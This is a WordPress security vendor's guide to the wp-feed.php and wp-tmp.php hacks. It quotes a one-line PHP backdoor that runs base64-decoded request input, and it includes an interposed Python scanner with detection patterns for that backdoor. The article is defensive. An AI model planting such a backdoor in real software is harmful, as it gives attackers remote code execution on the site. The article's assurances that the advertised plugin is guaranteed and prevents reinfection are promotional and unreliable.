How to Fix wp-feed.php & wp-tmp.php Malware in WordPress?

Mar 2, 2020

Are your visitors complaining about spam ads on your WordPress website but you don’t see any? Is your malware scanner alerting you that “your site is hacked” but it looks fine to you? Did you know that a hacker can hide the hack from you? Hackers find clever ways to disguise their hacks from site owners so that they go undetected for a long time. Two common and well-disguised hacks are the wp-feed.php hack and the wp-tmp.php hack.

Under these kinds of hacks, your site displays ads for illegal products, drugs, and adult content to your visitors (read – pharma hack), and the hackers insert backdoors, among other things.

As the hack is hidden from you, it tends to stay active on your site for a long time before you discover it. There are high chances Google will detect it before you do. If they find malware, they’ll blacklist your site immediately to protect their users. Next, your web host will be quick to suspend your account to safeguard their own interests.

These repercussions will take a severe toll on your website and your business. Luckily, there are ways to fix these types of hacks and get your website back to normal.

In this guide, we’ll explain what the wp-feed and wp-tmp hacks are and show you steps to remedy and prevent them.

TL;DR – Our MalCare Security Plugin is designed to identify and remove the wp-feed and wp-tmp hacked files even if they’re disguised or hidden. After you install the plugin, MalCare will scan and find the files. The plugin will also help you clean your site in under a few minutes and get back to business.


What Is Wp-tmp.php?

When your WordPress website is getting a sizable amount of traffic, displaying ads on your site can bring in good revenue. But this factor also makes it susceptible to the wp-feed hack.

In this wp-feed.php hack, the attacker will hijack your ads and post content of their choice. This usually means your visitors would see obscene ads for adult content or illegal drugs. The hacker could also change the featured image on the post a visitor is currently looking at. However, when you visit your website, it looks normal.

How is it hidden from you but not from the visitors? This is where the wp-feed.php file comes in. The file records the IP address of every user of the website. When a visitor comes to the website, it checks the IP against its record. If the visitor is a user, then the file shows him/her the usual clean content. If it’s not a user, then the file identifies this as a custom feed and displays custom content.

Hackers create a wp-tmp.php file to install a backdoor on your site. By using this WordPress file, hackers can access your website and inject malware any time they want. If you clean your website of the malware and don’t remove the wp-tmp.php file, you can be sure that your site will be hacked again soon. A wp-tmp WordPress file may look like the following code:


$p = $_REQUEST["m"]; eval(base64_decode($p));


If you suspect you’ve been hacked, you can scan your site to confirm your doubts.


How To Scan Your WordPress Website For Wp-feed And Wp-tmp Files

You can scan your WordPress site for hacked files in two ways – manually or by using a plugin. We’ll explain both.

Manually Cleaning Your Hacked WordPress Website

To scan your site manually, you need to access your WordPress files. Access your WordPress hosting account. Next, log in to cPanel > File Manager.

[Screenshot: cPanel File Manager showing the public_html folder]

Here, navigate to public_html. You can look for wp-feed.php files and wp-tmp.php files using the search option. Once you locate these files, you can simply delete them.

We DON’T RECOMMEND this method because it is proven to be ineffective in many cases. Every time the code in these WordPress files is executed, it creates new malware code in other files. It’s a complex hack and can infect several files. Hackers also write the code in such a way that the file can reappear every time someone visits your site. If you want to have any shot at fixing your site, you need to make sure no one visits your site while you clean it.

Hackers also make it extra difficult to clean it manually by changing the location of these WordPress files. This method can be frustrating because after cleaning it multiple times, you’ll find that your site is still hacked.

To get rid of such complex hacks, it’s best to use Website Security Services like MalCare. Let’s take a look at how it works.

Automatically Cleaning Your Hacked Website With MalCare

As we discussed earlier, the wp-feed attack is complicated. The reasons we recommend using MalCare are aplenty:

    • MalCare is a security plugin that was designed by studying over 240,000 WordPress sites. It’s built on technology that is guaranteed to work and can clean your site instantly.
    • Many plugins available usually check for commonly detected malware and miss any new kind of malware. MalCare analyzes the behavior of code. In doing so, it can find new, hidden and disguised malware as well.
    • Many plugins give you surface scans. But with the wp-feed attack, you need a plugin that will run a deep scan of your entire website. MalCare does just that. It combs through all your website’s files, folders, and the database.
    • It also identifies backdoors such as the wp-tmp.php file and helps you get rid of them.

Note: Hackers may use the same coding of wp-feed and wp-tmp and rename the file as something else. This makes it harder to find manually but not with MalCare. The plugin will find the malware regardless of the file name.
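A content-based check for the renamed or relocated files described above, added here as an example (it is not MalCare's code or method): it flags the two file names from this guide and any file containing the eval(base64_decode(...)) pattern from the sample code, whatever the file is called. The regular expressions, function names and sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# File names this guide tells you to search for.
KNOWN_NAMES = {"wp-feed.php", "wp-tmp.php"}
# Assumption: generalises the guide's sample (eval of base64-decoded data).
# Whitespace and /* */ comments between the tokens are tolerated.
_GAP = rb"(?:\s|/\*.*?\*/)*"
EVAL_DECODE = re.compile(
    rb"eval" + _GAP + rb"\(" + _GAP + rb"base64_decode" + _GAP + rb"\(",
    re.IGNORECASE | re.DOTALL,
)
# Request superglobals: the decoded code comes from whoever calls the file.
REQUEST_INPUT = re.compile(rb"\$_(?:REQUEST|POST|GET|COOKIE)\b")


def scan_tree(root, max_bytes=2_000_000):
    """Return sorted (relative_path, reason) findings for every file under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name.lower() in KNOWN_NAMES:
                findings.append((rel, "known-name"))
            try:
                with open(path, "rb") as fh:
                    data = fh.read(max_bytes)  # cap the read on large files
            except OSError:
                continue  # unreadable file: nothing to inspect
            if EVAL_DECODE.search(data):
                hit = "eval-base64-request" if REQUEST_INPUT.search(data) else "eval-base64"
                findings.append((rel, hit))
    return sorted(findings)

def demo():
    """Scan a constructed sample tree (not real site data)."""
    samples = {
        "wp-tmp.php": b'<?php $p = $_REQUEST["m"]; eval(base64_decode($p));',
        "wp-content/uploads/cache.php": b'<?php $p = $_REQUEST["m"]; EVAL ( Base64_Decode ($p));',
        "wp-content/plugins/example/util.php": b"<?php $d = base64_decode($stored);",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(body)
        return scan_tree(root)
```

Call `scan_tree` on your public_html directory; it only reads files, so review each hit before deleting anything.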

How To Use MalCare To Clean The Wp-Feed.php Hack

Cleaning your website with MalCare can be done in three easy steps:

Step 1: Activate the Plugin

Install MalCare on your WordPress website. You can do this directly from the MalCare website or from the WordPress repository.

Step 2: Scan your Site

You can scan your website for free with MalCare. From your WordPress dashboard, select MalCare > Malware Scan and click on scan.

[Screenshot: MalCare malware scan]

Step 3: Clean your WordPress Site

Once MalCare detects the hacked files, you’ll see an alert like so:

[Screenshot: MalCare alert showing hacked files found]

Click on Auto-Clean to clean your site. The plugin will start the cleaning process and your site will be clean in under a few minutes.

You can rest assured that you’re rid of the hack and any backdoors that were present on your website.

Note: If you see an ‘Upgrade’ option instead of ‘Auto-clean’, you need to sign up for a MalCare plan. Malware removal is a premium service with all plugins because it is complex and requires a lot of work.


How to Prevent the Wp-Feed.php and Wp-Tmp.php hack?

There are various ways of preventing the wp-feed and wp-tmp hack. We’ll touch upon the most effective ones:

    • Use a WordPress Security Plugin

Always keep a website security plugin like MalCare active on your site. It will scan your website every day. It puts up a strong firewall to block hackers and malicious traffic from visiting your site. Plus, if there’s any suspicious activity on your site, MalCare will alert you and you can fix it instantly with the help of the plugin.

    • Implement WordPress Hardening Measures on Your Site

There are recommended hardening measures that will make it much more difficult for hackers. These include using strong passwords, resetting the login credentials for all users, and disabling plugin installation. Follow our guide on WordPress Hardening to implement it on your site.

    • Never Install Nulled Themes and Plugins

Nulled software is another word for pirated software. These nulled themes and plugins give you access to premium features free of cost. But there’s always a price. These elements are contaminated with malicious code. Once you install the nulled theme or plugin on your site, the malware is activated and infects your website. This is one of the most common reasons for wp-feed attacks. If you’re using such software, delete it immediately and vow never to use it again.

Use plugins that are listed in the WordPress plugins directory or premium ones you can trust. The same applies to WordPress themes.

    • Always Keep Your WordPress Site Updated

Another reason why these hacks occur is because of outdated themes and plugins. Working in the WordPress realm for more than a decade, we’ve seen how vulnerabilities appear in themes and plugins over time. In most cases, developers are quick to fix it and release a security patch in an updated version.

You’ll usually see a prompt on your dashboard to update your software or they’ll notify you by mail. Once you update your plugin/theme, the vulnerability will be fixed. But if you choose to ignore it, then you become an easy target for hackers. Always keep your WordPress installation and its themes and plugins updated. Check out our detailed guide on How To Safely Update Your Site.


Final Thoughts

Cleaning the wp-feed.php hack can be an easy task or a nightmare depending on how you choose to resolve the problem – manually or using a plugin.

Remember, the longer the hacked files remain on your site, the greater the impact becomes! If you want to remove the files immediately, then it’s best to use a plugin.

That said, not all plugins can clean your website immediately. MalCare is one of the only plugins available that enables you to clean your site automatically and instantly without long waiting times. Plus, once your WordPress site is clean, the plugin will continue to protect your site. You needn’t worry that your site will be hacked again! For more information you can check our guide on how to protect your website from hackers.

Try Our MalCare WordPress Security Plugin Now!

